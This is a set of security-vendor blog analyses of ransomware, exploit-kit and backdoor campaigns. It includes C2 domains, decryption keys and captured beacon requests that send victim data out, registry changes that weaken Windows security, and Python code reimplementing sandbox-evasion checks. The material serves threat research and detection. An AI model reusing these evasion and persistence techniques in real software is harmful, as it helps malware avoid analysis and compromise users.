fb016a14ef1384ec78a284636631ab17

 

Screen Locker (SD)

29e71b864ac46bd3e2c216cce0403114

 639c62bcae61054a229ed3c79a109cc4

092b9e87bd75384df188feb2c4e402a2

e8231d2b7a04a5826a78b2908a1dd393

 

Mutex Names

ItsMeFA

ItsMeSD

The post New Family of Ransom Locker Found, Uses TOR Hidden Service appeared first on Cyphort.

Malvertising on Indonesian portal gopego.com delivers Cryptowall 3.0


On February 4, 2015, Cyphort Labs detected another malvertising campaign originating from gopego.com. The site displays a malicious advertisement that redirects through other malicious links and eventually downloads the CryptoWall ransomware.

The attack serves an exploit package embedded in a Flash file, with exploits targeting four vulnerabilities. Among them is the notorious CVE-2015-0311, which hit affyield.com a few days earlier.

(Figure 1: iframe redirecting to the Flash exploit kit)


Exploit Analysis

The initial Flash file is essentially an exploit package: a platform for delivering the other exploits embedded in it. As seen before, the initial Flash exploit (MD5: 31710b3fe36943bd5273d4fb0f0efa85) is obfuscated and loads a second-stage Flash file using loadBytes(). The second stage reads a Flash parameter (rtConfigEncodedString) that holds an RC4-encrypted JSON configuration; the key is 'vukocwgsos142160'. This JSON contains the list of URLs for the binary payloads along with the RC4 keys used to decrypt those binaries.

(Screenshot: RC4 decryption of the rtConfigEncodedString configuration)

The second-stage Flash uses ExternalInterface.call() to inject JavaScript into the browser DOM and query various properties of the execution environment.

(Screenshot: environment fingerprinting via ExternalInterface.call())

It carries several exploits embedded as binary data, in encrypted and compressed form. Based on the environment it chooses an appropriate exploit, decrypts it using RC4 with the key "florbgd622662", and decompresses it if necessary. Depending on the vulnerability, the decrypted exploit is then either injected into the browser DOM as HTML/JavaScript or loaded as a third-stage SWF file.

(Screenshot: embedded exploit blobs and their names)

The screenshot above shows binaries which exploit the following vulnerabilities:

CVE-2013-2551 – nw2_html
CVE-2014-6332 – nw7_html
CVE-2015-0311 – nw9_swf
CVE-2014-0569 – nw6_swf

 

After successful exploitation, the shellcode downloads an RC4-encrypted binary over the network and decrypts it using the key "fxfdaxrrax".

(Screenshot: CryptoWall 3.0 being downloaded over the network)
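The three RC4 layers described above (the rtConfigEncodedString configuration, the embedded exploits and the downloaded binary), as an added example that is not the exploit kit's or Cyphort's own code. The keys are the ones quoted in the text; the JSON field names, the choice of zlib for the "compressed" exploit blobs and every sample blob are constructed assumptions, so only the decryption pattern carries over to a real capture.

```python
"""RC4 helpers for the three encrypted layers of this Flash exploit package.

Added example, not the exploit kit's or Cyphort's code. The three keys are the
ones quoted above; the JSON layout (field names), the zlib choice for the
"compressed" exploits and all sample blobs are constructed assumptions.
"""
import json
import zlib


def rc4(key, data):
    """Plain RC4: key scheduling, then XOR with the PRGA keystream.

    Encryption and decryption are the same operation.
    """
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


CONFIG_KEY = b"vukocwgsos142160"    # rtConfigEncodedString
EXPLOIT_KEY = b"florbgd622662"      # embedded exploit blobs
PAYLOAD_KEY = b"fxfdaxrrax"         # binary fetched by the shellcode


def decrypt_config(blob):
    """Decrypt the FlashVars configuration and parse it as JSON."""
    return json.loads(rc4(CONFIG_KEY, blob).decode("utf-8"))


def decrypt_exploit(blob, compressed):
    """Decrypt an embedded exploit and, if flagged, decompress it (zlib assumed)."""
    plain = rc4(EXPLOIT_KEY, blob)
    return zlib.decompress(plain) if compressed else plain


def decrypt_payload(blob, key=PAYLOAD_KEY):
    """Decrypt the downloaded binary; refuse anything without an MZ header."""
    plain = rc4(key, blob)
    if plain[:2] != b"MZ":
        raise ValueError("no MZ header after RC4: wrong key or wrong layer")
    return plain


# Constructed sample data standing in for a captured session.
SAMPLE_CONFIG = {"bins": [{"url": "http://example.invalid/load/1", "key": "fxfdaxrrax"}]}
ENC_CONFIG = rc4(CONFIG_KEY, json.dumps(SAMPLE_CONFIG).encode("utf-8"))
FAKE_EXPLOIT = b"<html><script>/* exploit stub */</script></html>"
ENC_EXPLOIT = rc4(EXPLOIT_KEY, zlib.compress(FAKE_EXPLOIT))
FAKE_PE = b"MZ" + bytes(62) + b"PE\0\0" + bytes(20)
ENC_PAYLOAD = rc4(PAYLOAD_KEY, FAKE_PE)

if __name__ == "__main__":
    cfg = decrypt_config(ENC_CONFIG)
    print("config:", cfg)
    print("exploit:", decrypt_exploit(ENC_EXPLOIT, compressed=True))
    key = cfg["bins"][0]["key"].encode("utf-8")
    print("payload starts with:", decrypt_payload(ENC_PAYLOAD, key)[:2])
```

The MZ check in decrypt_payload is the cheap sanity test an analyst actually relies on when working through a capture: RC4 happily "decrypts" anything, so a wrong key or a blob from the wrong layer only shows up as a missing header.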

 

Payload

MD5: 0cffee266a8f14103158465e2ecdd2c1

The final payload is a variant of CryptoWall version 3.0 (also known as Crowti). Like its predecessor, it uses the RSA-2048 algorithm to encrypt files on the hard disk. It also drops the following well-known files in each affected directory; these files contain instructions on how to pay the ransom.

(Screenshot: ransom note files dropped in each directory)

Once it has finished encrypting files, the malware visits the URL http://paytoc4gtpn5czl2.torpaysolutions.com/hkmxYL and demands that the victim pay US$500 in Bitcoin to receive the decryption key that recovers the files. It also displays a 168-hour (7-day) countdown for payment; if the deadline passes, the price rises to US$1,000.

(Screenshot: ransom demand with countdown)

(Screenshot: instructions on how to pay the ransom using Bitcoin)

The ransomware program provides users with links to several Tor gateways leading to CryptoWall decryption services hosted on the Tor network.

There have also been reports that this new version of CryptoWall uses the I2P (Invisible Internet Project) anonymity network for communication between victims and controllers, to hide from researchers and law enforcement.

We have seen this malware connect to following CnC servers:

  • asthalproperties.com:4444
  • pratikconsultancy.com:8080

It retrieves the victims IP address by visiting ip-addrs.es.

Cyphort Labs has seen malvertising campaigns on the rise. They remain the favorite delivery method of threat actors for drive-by-download attacks. With every discovery of a zero-day exploit, actors rapidly take advantage and update their kits to deliver malicious binaries more reliably. It is always advisable to take precautions when browsing the web and to patch software to the latest available version.

Special thanks to McEnroe Navaraj, Alex Burt and the rest of the Cyphort Labs team for their help in the discovery and analysis of this attack.

The post Malvertising on Indonesian portal gopego.com delivers Cryptowall 3.0 appeared first on Cyphort.

DIY Chatroom and over a hundred forums injected with malware


Cyphort Labs discovered a malware campaign attacking over a hundred popular forum websites. They run outdated forum software, so a known vulnerability was most likely used to compromise them and inject the malicious redirection code. The injected code redirects to an exploit kit that downloads encrypted Gamarue malware that is sandbox-aware (it does not execute in virtual environments). As of April 8, 2015 the campaign is still ongoing. We analyzed one of the infection chains below, which happens to have minimal detection on VirusTotal.

(Screenshot: injected redirect code on diychatroom.com)

On April 6, 2015 Diychatroom.com was redirecting users to the Fiesta Exploit Kit. It delivers a multi-stage binary payload involving several malware families.

 The affected websites include:

  • www.Diychatroom.com
  • www.dogforums.com
  • www.e-cigarette-forum.com
  • www.excelforum.com
  • www.goldenretrieverforum.com
  • www.horseforum.com
  • www.loverslab.com
  • www.ps3news.com
  • www.scubaboard.com
  • www.visajourney.com
  • www.wranglerforum.com
  • www.wrestlingforum.com
  • and many others, 122 in total!

Many of the domains are owned by VerticalScope, a private company with 120 employees headquartered in Toronto, Canada. It specializes in buying and promoting websites and forums by using a big number of generic domain names they acquired over the past decade. VerticalScope has over 400 websites with combined reach of more than 80 Million unique visitors per month.

 Diychatroom.com Infection

The infection chain is as follows:

diychatroom.com
  ---> numerarm.org (redirect URL)
    ---> http://livefastmap.eu/xxx1 (Fiesta EK landing)
    ---> http://livefastmap.eu/xxx2 (Flash exploit)
    ---> http://livefastmap.eu/xxx3 (binary payload)

 

This EK is heavily obfuscated, but after several layers of deobfuscation it clearly reveals what it tries to do. It exploits the following vulnerabilities:

  • CVE-2013-2551 (IE)
  • CVE-2015-0313 (Flash)

(Screenshot: deobfuscated CVE-2013-2551 exploit code)

(Screenshot: first-layer Flash file using loadBytes() to load the second layer)

(Screenshot: second-layer Flash file carrying the CVE-2015-0313 exploit)


 Cyphort detects the infection through its chain heuristics engine and browser cooker engine.

 

Payload

The payload arrives encrypted over the network. It is a multi-stage malware: a main dropper carrying two files in its resource section, plus one more file downloaded later.

  • 77f22bfc9cf7e46c6e738d8b68ad19f6   – Main Dropper
  • c091894cd23d49a14d5cabf0d60c379c  – Gamarue
  • 2e543c5c9f1df385661d6e527eff2f46 – TrojanClicker.FleerCivet
  • 7a6229f6afe767009fe22a119c4165a1 – Backdoor.Ruperk

At the time of discovery, only minimal detection was observed on VirusTotal. Cyphort’s Advanced Threat Detection platform detects all these files.

 

Main Dropper

The main dropper is armored and will not execute in a virtual environment.

Armoring:

  • anti-VirtualBox
  • anti-QEMU
  • anti-VMware

It checks for the strings VBOX, QEMU and VMWARE in the device property strings (such as the device description or hardware ID) returned by SetupDiGetDeviceRegistryPropertyW.

(Screenshot: armoring checks on SetupDiGetDeviceRegistryPropertyW results)

On a non-virtual system, it drops the two files from its resource section into the %TEMP% folder and executes them via CreateProcess or ShellExecute.

 

 

Resource 1

Family: Gamarue

[SHA1:] 039D532C02B7441D9D8C0DBB4D67FDC3AF428DD2

[MD5:] c091894cd23d49a14d5cabf0d60c379c

When executed, it creates a new msiexec.exe process and injects code into it. It drops a copy of itself in %ALLUSERSPROFILE% under a random filename, e.g. "mssffnmc.exe".

It creates an autostart entry as follows:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
      Value: {random}
      Data: %ALLUSERSPROFILE%\{copy of itself}

It weakens several Windows security settings by changing the following registry values:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
      Value: "EnableLUA"
      Data: "0"            (turns off UAC after the next reboot)

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
      Value: "TaskbarNoNotification"
      Data: "1"            (suppresses taskbar balloon notifications)
      Value: "HideSCAHealth"
      Data: "1"            (hides the Security Center / Action Center icon)

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
      Value: "Hidden"
      Data: "2"            (Explorer does not show hidden files)

 

It connects to its CnC server, nindziaboy.net to send data and receive commands. Communication to the server is encrypted and depending on the reply, it can perform the following commands:

  • Report 
  • Update
  • Start

 

(Screenshot: CnC traffic to nindziaboy.net)

It also performs DNS requests to the following NTP pool domains:

  • africa.pool.ntp.org
  • oceania.pool.ntp.org
  • asia.pool.ntp.org
  • south-america.pool.ntp.org
  • north-america.pool.ntp.org
  • europe.pool.ntp.org

 

Resource 2

Family: TrojanClicker.FleerCivet

[SHA1:] 79137D2553FD19C2EB287957BB7E5506DF88CD02

[MD5:] 2e543c5c9f1df385661d6e527eff2f46

 

This malware's main purpose is to open several hidden Internet Explorer instances that visit websites.

Like the main dropper, it exits and does nothing if it detects that it is running in a virtual environment.

(Screenshot: armoring checks in the clicker)

It drops a copy of itself as Update.exe in the %Windows%\FrameworkUpdate folder, then registers itself as a service named "SystemUpdate".

(Screenshot: service creation)

It injects into iexplore.exe, chrome.exe, firefox.exe or explorer.exe to gain elevated privilege and tries to stop the following services:

  • SharedAccess
  • wscsvc
  • MpsSvc
  • WinDefend
  • wuauserv
  • BITS
  • ERSvc
  • WerSvc

It creates five threads that fire a hidden Internet Explorer Browser that visits the following URLs:

  • http://videosearcher{.}org/4ff9ae/9126
  • http://truesearchresults{.}com/?aff=7733&saff=9126

 

(Screenshots: the routine that creates several hidden IE instances visiting a URL)

Afterwards, the following network connections were observed. The requests themselves go to a web-analytics script and a hit counter, exactly what a real browser would load on that page; it is the Referer that ties them to the clicker:

GET /analytics.js HTTP/1.1
Accept: */*
Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.google-analytics.com
Connection: Keep-Alive

GET /hit?t44.6;r;s1162*589*32;uhttp%3A//truesearchresults.com/casino.php%3Fparams%3D9kwXw9wr5uVwtaXFgiQ%252FkHA8rqoFYQ3%252FQyL57Nj%252BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%252F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%252BihDRQfDOiVNwnSfCX%252FAkh8UtPfNP%252B%252FH0WEbMuVy38gjCQ%253D;0.7172015003936206 HTTP/1.1
Accept: */*
Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: counter.yadro.ru
Connection: Keep-Alive

 

Additional details:

Creates mutex with the following name:

  •  _HSJ909NJJNJ90203_

Connects to the following urls to get geolocation of the victim’s machine.

  • www.telize.com/geoip

 If it detects that it is running on a 64-bit system, it will load its 64-bit counterpart that is found in its resource.

 

Downloaded Component

Family: Backdoor.Ruperk

[SHA1:] BD16D28FEECC00A744BFED06AB70C918FEE404C3

[MD5:] 7a6229f6afe767009fe22a119c4165a1

 

This file is downloaded from the following link:

  • http://clenodium{.}eu/tmp/file{.}exe

 

When executed, it drops a copy of itself in %LocalSettings%\ApplicationData\{random}\{random}.exe.

It creates a new wuauclt.exe process and injects into it. It then contacts the following CnC server and waits for commands:

  • dobavki-shop.com

Network Connection

GET /getter.php?mode=reg&id=xxxxx80-d14e-49fe-9c0a-1af5058475e7&os=5132&vga=VMware%20SVGA%20II&ocl=0 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: dobavki-shop.com
Connection: Keep-Alive

As the CnC request above shows, it sends system information in clear text, including:

  • MachineGuid (the id parameter)
  • OS version (os)
  • Display adapter name (vga; here "VMware SVGA II", which by itself tells the operator that the bot is running in a virtual machine)
  • ocl, most likely an OpenCL availability flag, which fits the #opencl and #update_miner commands below

 

It waits for the following commands from the server.

  • #none – do nothing
  • #stop
  • #update – update self
  • #update_miner
  • #opencl
  • #destruct – kill self
  • #error
  • #download  – Download files


The server evaluates the information it receives from infected computers and replies with one of the commands above. When the trojan runs in a virtual environment (or sandbox), which the vga field gives away, the server keeps it dormant by replying #none.
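An added detector (not Cyphort's code) for the two network behaviours documented above, run over constructed proxy-log lines: it flags Ruperk's getter.php?mode=reg registration beacon, decodes the leaked fields and notes when the vga value identifies a virtual machine (which is how the server can decide to answer #none), and flags FleerCivet sessions by their truesearchresults.com Referer. The log layout and the bot id in the sample are made up; the hosts, paths and parameter names come from the captures above.

```python
"""Detect the two network behaviours documented above in proxy logs.

Added example, not Cyphort's code. It flags Backdoor.Ruperk registration
beacons (getter.php?mode=reg...) and decodes the fields they leak, and flags
TrojanClicker.FleerCivet sessions by their truesearchresults.com referer.
The log layout and the lines in SAMPLE_LOG are constructed for the example;
only the paths, hosts and parameter names come from the captures above.
"""
import re
from urllib.parse import parse_qs, urlsplit

RUPERK_PATH = re.compile(r"^/getter\.php$")
FLEERCIVET_REFERER = re.compile(r"^https?://truesearchresults\.com/", re.IGNORECASE)
# Adapter names that give a virtual machine away to the operator.
VM_ADAPTERS = ("vmware", "virtualbox", "vbox", "qemu", "hyper-v", "qxl")


def parse_log_line(line):
    """Constructed layout: 'client host method url referer' (referer '-' if none)."""
    client, host, method, url, referer = line.split(" ", 4)
    return {"client": client, "host": host, "method": method,
            "url": url, "referer": "" if referer == "-" else referer}


def classify(entry):
    """Return (family, details) for a suspicious request, else None."""
    parts = urlsplit(entry["url"])
    if RUPERK_PATH.match(parts.path):
        q = {k: v[0] for k, v in parse_qs(parts.query).items()}
        if q.get("mode") == "reg" and "vga" in q:
            vga = q["vga"]          # parse_qs already percent-decodes
            return "Backdoor.Ruperk", {
                "bot_id": q.get("id", ""),
                "os": q.get("os", ""),
                "vga": vga,
                "opencl": q.get("ocl", ""),
                "looks_like_vm": any(t in vga.lower() for t in VM_ADAPTERS),
            }
    if FLEERCIVET_REFERER.match(entry["referer"]):
        return "TrojanClicker.FleerCivet", {
            "referer_host": urlsplit(entry["referer"]).netloc,
            "hit_host": entry["host"],
        }
    return None


def scan(lines):
    """Return a list of (client, host, family, details) for every flagged request."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        entry = parse_log_line(line)
        verdict = classify(entry)
        if verdict:
            hits.append((entry["client"], entry["host"]) + verdict)
    return hits


SAMPLE_LOG = """\
10.0.0.7 dobavki-shop.com GET /getter.php?mode=reg&id=00000000-0000-4000-8000-000000000001&os=5132&vga=VMware%20SVGA%20II&ocl=0 -
10.0.0.7 www.google-analytics.com GET /analytics.js http://truesearchresults.com/casino.php?params=abc
10.0.0.7 counter.yadro.ru GET /hit?t44.6;r;s1162*589*32 http://truesearchresults.com/casino.php?params=abc
10.0.0.9 www.example.com GET /index.html -
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

The Referer match is deliberately the only FleerCivet criterion: the hosts it hits (google-analytics.com, counter.yadro.ru) are benign on their own, so keying on them would drown the detection in normal browsing.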

Through our chain heuristics and browser cooker engine, we discovered that several other forum sites are infected with the same attack. These forum sites are powered by vBulletin or by IP.Board.

Early this year the Sucuri blog reported a serious vulnerability in vBSEO that allows an attacker to execute arbitrary PHP code remotely on the website. vBSEO is an add-on for vBulletin that has been discontinued because of repeated vulnerabilities; sadly, some websites still use it.

For website administrators affected by this attack, Sucuri posted the following options:

  1. Completely remove vBSEO from your site – It is not supported anymore
  2. Apply the patch recommended by the vBulletin team
  3. Put your site behind a Website Firewall, this will prevent the exploitation of this vulnerability and many others.

 For visitors of forum sites, ensure that you are running the latest version of browsers and flash as this attack involves IE and flash exploits.

Connecting Dots

For the curious threat researchers out there: why would the armored malware avoid all three popular virtualization environments (VirtualBox, QEMU and VMware), even VMware, a fairly popular platform in many businesses? Cyphort Labs has seen samples that single out VirtualBox and QEMU for evasion but run happily inside VMware; in those cases the armoring is aimed at anti-analysis or anti-sandboxing. As mentioned earlier, this campaign targets over a hundred forums that mostly serve individual home users, and the payload (TrojanClicker.FleerCivet) is part of a click-fraud campaign. For click fraud to look legitimate the clicks had better come from home users, and very few home users run VirtualBox, QEMU or VMware. So we believe this malware pack is designed for click fraud, distributed through watering-hole attacks, and armored against every virtualization environment to avoid detection by anti-click-fraud systems.

 Special thanks to Alex Burt, McEnroe Navaraj, Palaniyappan Bala, and the rest of the Cyphort Labs team for their help in the discovery and analysis of this attack.

The post DIY Chatroom and over a hundred forums injected with malware appeared first on Cyphort.

Multiple Malwares used to Target an Asian Financial Institution


Recently, Cyphort Labs received multiple malware samples that were used to target a financial institution in Asia. Due to an ongoing investigation, we will keep the company anonymous. According to the source, the initial entry point was a spear-phishing email sent to one of the employees. The attack involves multiple backdoors and info-stealing trojans. Some of the malware has anti-sandbox properties and protections against the heuristic signatures commonly used by antivirus products. The samples share a common theme: they install themselves in %ProgramFiles% if the user has admin privileges and in %UserProfile% otherwise. Most are compiled with Borland Delphi, with strings encrypted and API names either obfuscated or split into several strings to defeat heuristic signatures. None of the samples are packed except for one.

Based on the files' creation dates, the attack appears to have started as early as January 2015 and lasted about three months. (File timestamps are easy to alter, so treat this as an estimate.)

(Screenshot: file creation dates of the samples)

 

Summary of samples used in this attack

Filename          MD5                               Family    Compiler        Packer  Function
GoogleUpdate.exe  34bad798c01b4b52d708c1409590ea30  Invader   Borland Delphi  None    Backdoor
Flash32.exe       a32d4a717fde77f437f9a01a7b8b8478  Invader   Borland Delphi  None    Backdoor
mslives.exe       52f4092576e46747db71fb2c018d6ec5  -         Borland Delphi  None    Downloader
nethost.exe       3f9e7a1fb8093994ea0f0bbf151ff1e0  Nioupale  C++             None    Backdoor
mpsvc.exe         4e25c2fc8cb2c57ae66ee3cf851e4bc7  Nioupale  Borland Delphi  None    Backdoor
winhost.exe       044e2e7c4813accdbe030c49cef3326b  Hdoor     Borland Delphi  Aspack  Backdoor
dllhost.exe       387942a24884ccadb60b7e7670a0f723  -         C++             None    Downloader
shell64.dll       abf5e379e336f0e6f7314f8bb3f7bcba  PCclient  C++             None    Infostealer
shell64_u.dll     756c11141ab617a2fe38b963a5548378  -         C++             None    Loader

("-" = family not identified)

Technical Analysis

GoogleUpdate.exe

Unlike most prevalent malware today, this file has an ordinary structure: it is not packed and its sections resemble those of a normal program. That matters because most AV products employ heuristics that flag packed samples and samples with an uncommon file structure.

Strings are encrypted and only decrypted right before use. The malware also splits its API names into several string fragments, again to avoid heuristic signatures that look for suspicious strings and API names.

(Screenshot: encrypted strings and split API names in GoogleUpdate.exe)

It drops a copy of itself in the %ProgramFiles% folder if the user is an admin and in the %UserProfile% folder if not:

If admin:

  • %ProgramFilesDir%\Windows NT\Accessories\nt\GoogleUpdate.exe

If not admin:

  • %UserProfile%\Applications\GoogleUpdate.exe

It installs itself as a service with the service name "SENSS".

(Screenshot: the SENSS service)

After confirming that it is running as a service, it checks whether its parent process is explorer.exe or iexplore.exe. If so, it loads the DLL embedded in its data section; this DLL is XOR-encrypted with the single-byte key 0x89. Otherwise, it enumerates processes, finds services.exe and injects the DLL into it.

Anti-Sandbox

Detects sleep acceleration

Malware commonly delays execution with sleeps or loops to defeat sandboxes: a sandbox runs a sample for only a short, limited time, whereas once inside a victim's system the malware has all the time it needs. Sandboxes counter this by accelerating delays. If a sample sleeps for one minute, for example, the sandbox may shorten the sleep to one second. Against this sample the trick does not work: it detects sleep acceleration by issuing a sleep, measuring the time that actually elapsed, and checking whether the elapsed time is shorter than the requested sleep.

[Figure: sleep acceleration detection routine]

Detects API hooks

Sandbox systems also hook APIs to record a file's behavior. This malware detects hooks by checking whether the first instruction of a given API is a jmp, a call or a push/retn, i.e. whether the bytes at the API's address start with one of the following:

  • E8
  • E9
  • EB
  • FF
  • 68????????C3 (push retn)
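Both checks above are simple to reproduce. The following Python is an added example written for this article, not code from the sample: it implements the sleep-acceleration test against a monotonic clock and the hook-prologue test against constructed byte strings (on a real system the bytes would be read from the resolved API address; the prologues here are made up).

```python
import time
from typing import Optional

# Opcodes the malware treats as evidence of an inline hook at an API entry:
# E8 call rel32, E9 jmp rel32, EB jmp rel8, FF /2 or /4 call/jmp through memory.
HOOK_OPCODES = {0xE8, 0xE9, 0xEB, 0xFF}


def looks_hooked(prologue: bytes) -> bool:
    """Apply the malware's prologue heuristic to the first bytes of an API.

    Returns True for the single-byte opcodes above and for the
    68 xx xx xx xx C3 (push imm32 / ret) trampoline, False otherwise.
    """
    if not prologue:
        return False
    first = prologue[0]
    if first in HOOK_OPCODES:
        return True
    # push imm32 followed by ret: 68 <4 bytes> C3
    return first == 0x68 and len(prologue) >= 6 and prologue[5] == 0xC3


def sleep_looks_accelerated(requested_ms: int, elapsed_ms: Optional[float] = None) -> bool:
    """Return True if a sleep of requested_ms came back early.

    With elapsed_ms=None the function really sleeps and measures the wall
    time with a monotonic clock, the same comparison the malware makes with
    Sleep and the tick count. Pass elapsed_ms to evaluate a recorded
    measurement without sleeping.
    """
    if elapsed_ms is None:
        start = time.monotonic()
        time.sleep(requested_ms / 1000.0)
        elapsed_ms = (time.monotonic() - start) * 1000.0
    # A sandbox that patched the sleep returns before the requested time has passed.
    return elapsed_ms < requested_ms


# Constructed prologues for the demo; these are not bytes taken from a real system.
SAMPLE_PROLOGUES = {
    "clean (mov edi,edi; push ebp; mov ebp,esp)": b"\x8b\xff\x55\x8b\xec",
    "jmp rel32 detour": b"\xe9\x10\x20\x30\x40",
    "jmp [mem] detour": b"\xff\x25\x00\x10\x40\x00",
    "push/ret trampoline": b"\x68\x00\x10\x40\x00\xc3",
}


def triage_prologues(prologues=SAMPLE_PROLOGUES):
    """Return the names of the prologues the heuristic would report as hooked."""
    return [name for name, code in prologues.items() if looks_hooked(code)]


if __name__ == "__main__":
    for name in triage_prologues():
        print("hooked:", name)
    print("sleep accelerated:", sleep_looks_accelerated(50))
```

Two caveats worth keeping in mind: the sleep check is only as good as the clock it reads, so a sandbox that also skews the tick counter while accelerating sleeps defeats it, and the prologue check produces false positives on legitimately detoured APIs, since security products and compatibility shims hook the same functions.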

Payload

The injected code is a backdoor that communicates to the following C&C servers:

  • bbs.gokickes.com:80
  • img.lifesolves.com:8080
  • domain.gokickes.com:443

 

Depending on the commands it receives from the C&C, the backdoor can:

  • Download and execute additional files
  • Capture screenshots
  • Capture mouse and keyboard events
  • Update itself
  • Open a remote shell
  • Terminate processes
  • Enumerate network shares
  • Enumerate drives
  • Uninstall itself

Lastly, all data sent to and received from the server is encrypted with the single-byte XOR key 0xD5.

[Figure: C&C traffic encryption routine]
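Both single-byte XOR schemes in this sample (0x89 for the embedded DLL, 0xD5 for the C&C traffic) can be undone with a few lines. The following Python is an added example for this article, not code from the sample or from Cyphort: it recovers the DLL key from the known "MZ" header bytes, brute-forces the traffic key against an expected field name, and decrypts. The encrypted inputs are constructed stand-ins, not captured data.

```python
from typing import Optional


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; the same call encrypts and decrypts."""
    return bytes(b ^ key for b in data)


def recover_xor_key(blob: bytes, known_plaintext: bytes = b"MZ", offset: int = 0) -> Optional[int]:
    """Recover a single-byte XOR key from known plaintext at a known offset.

    The embedded DLL starts with the DOS header magic "MZ", so the first
    ciphertext byte XOR ord("M") is the key and the second byte confirms it.
    Returns None if no single key maps the ciphertext onto the known bytes.
    """
    if len(blob) < offset + len(known_plaintext):
        return None
    key = blob[offset] ^ known_plaintext[0]
    for i, expected in enumerate(known_plaintext):
        if blob[offset + i] ^ key != expected:
            return None
    return key


def brute_force_xor_key(blob: bytes, marker: bytes) -> Optional[int]:
    """Try all 256 keys and return the first one whose output contains marker.

    This is the approach for C&C traffic, where the first bytes are unknown
    but a field name or keyword is expected somewhere in the decoded data.
    """
    for key in range(256):
        if marker in xor_bytes(blob, key):
            return key
    return None


# Constructed stand-ins for the two encrypted artefacts: a fake PE header for
# the embedded DLL (key 0x89) and a fake beacon for C&C traffic (key 0xD5).
FAKE_DLL = b"MZ\x90\x00\x03\x00\x00\x00This program cannot be run in DOS mode."
FAKE_BEACON = b"id=1234&os=WinXP"
ENCRYPTED_DLL = xor_bytes(FAKE_DLL, 0x89)
ENCRYPTED_BEACON = xor_bytes(FAKE_BEACON, 0xD5)


def demo():
    """Recover both keys and decrypt, returning what an analyst would want to see."""
    dll_key = recover_xor_key(ENCRYPTED_DLL)
    beacon_key = brute_force_xor_key(ENCRYPTED_BEACON, b"id=")
    return {
        "dll_key": dll_key,
        "dll_plaintext": xor_bytes(ENCRYPTED_DLL, dll_key) if dll_key is not None else None,
        "beacon_key": beacon_key,
        "beacon_plaintext": xor_bytes(ENCRYPTED_BEACON, beacon_key) if beacon_key is not None else None,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: 0x{value:02X}" if isinstance(value, int) else f"{name}: {value!r}")
```

The known-plaintext route is the one to try first on any blob carved from the data section: a PE image gives you "MZ" at offset 0 and "PE\0\0" at the e_lfanew offset, so two independent confirmations of the same key cost nothing.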

 

 

mslives.exe

This sample has a file structure similar to GoogleUpdate.exe but does not employ the same anti-sandbox tricks.

When first run, it sleeps for 300 seconds before starting its installation routine. It then creates a copy of itself at:

  • %ProgramFiles%\Windows NT\Accessories\Microsoft\mslives.exe

The copy, however, is written with a large amount of garbage data appended to it, ballooning its size to more than 100 MB: the malware writes 100 KB of data to the file 1000 times. This behavior tries to evade sandboxes in two ways. First, the malware technically does not create an exact copy of itself, which departs from the usual pattern of dropping an identical copy and may look benign to a sandbox. Second, the sheer number of write events may exceed the sandbox's logging limit, and a dropped file of that size may be skipped by the sandbox altogether.

[Figure: mslives.exe padding its dropped copy]

It executes the dropped copy using CreateProcess and then checks whether it is running as iexplore.exe. If not, it creates a suspended iexplore.exe process and injects its code into it by overwriting iexplore.exe's main module.

It creates a hidden window whose window name and class name are both “111111”.

It then creates the following autostart registry entry so that it runs at every startup:

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: msliveupdate
    • Data: %ProgramFilesDir%\Windows NT\Accessories\Microsoft\mslives.exe

 

Payload

This sample has a single purpose: to download and execute a file from forum.energymice.com.

  GET /view/login.asp HTTP/1.1
  Content-Type: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; 5.1)
  Host: forum.energymice.com
  Cache-Control: no-cache

It saves the file in the %TEMP% folder and executes it. At the time of our analysis, however, the download URL was not returning any binary.

[Figure: mslives.exe download routine]

winhost.exe

Unlike the other files, this one is clearly packed. PEiD identifies the packer as:

  • ASProtect 1.2x – 1.3x [Registered] -> Alexey Solodovnikov

This file is a backdoor named “HDOOR”, a string we found in its body. We also found other strings that indicate the protector used:

  • HDoor, Version 1.0
  • Copyright (C) 2013
  • (c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com.

